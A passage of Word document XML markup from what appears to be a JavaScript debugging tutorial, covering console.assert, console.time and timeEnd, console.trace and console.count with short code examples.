          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>assert</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">x </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"This will fail"</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2727" w:name="timer"/>
      <w:bookmarkStart w:id="2728" w:name="_Toc483604460"/>
      <w:bookmarkStart w:id="2729" w:name="_Toc483605680"/>
      <w:bookmarkEnd w:id="2727"/>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Timer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2728"/>
      <w:bookmarkEnd w:id="2729"/>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162275">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>con</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sole.time</w:t>
      </w:r>
      <w:r w:rsidR="003613F0" w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and console.timeEnd log the time (in milliseconds) that was spent between the calls</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Both take a string argument that identifies the measurement. For example:</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> f</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w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    console</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time</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"wholeFunction"</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    console</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time</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"firstPart"</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// first part</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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    console</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timeEnd</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"firstPart"</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// second part</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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    console</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timeEnd</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"wholeFunction"</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2730" w:name="trace"/>
      <w:bookmarkStart w:id="2731" w:name="_Toc483604461"/>
      <w:bookmarkStart w:id="2732" w:name="_Toc483605681"/>
      <w:bookmarkEnd w:id="2730"/>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trace</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2731"/>
      <w:bookmarkEnd w:id="2732"/>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3613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>console.trace</w:t>
      </w:r>
      <w:r w:rsidR="003613F0" w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>prints the stack trace of the JavaScript execution at the point where it was called</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The stack trace info contains the function name, file name, line number and column number. The stack trace is </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">limited to last 10 </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stack frames</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2733" w:name="count"/>
      <w:bookmarkStart w:id="2734" w:name="_Toc483604462"/>
      <w:bookmarkStart w:id="2735" w:name="_Toc483605682"/>
      <w:bookmarkEnd w:id="2733"/>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Count</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2734"/>
      <w:bookmarkEnd w:id="2735"/>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3613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>console.count</w:t>
      </w:r>
      <w:r w:rsidR="003613F0" w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>prints the current number of times a particular piece of code has been executed</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, along with a message. That is,</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> f</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w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00385670" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385670">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00385670">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>console</w:t>
      </w:r>
      <w:r w:rsidRPr="00385670">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00385670">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
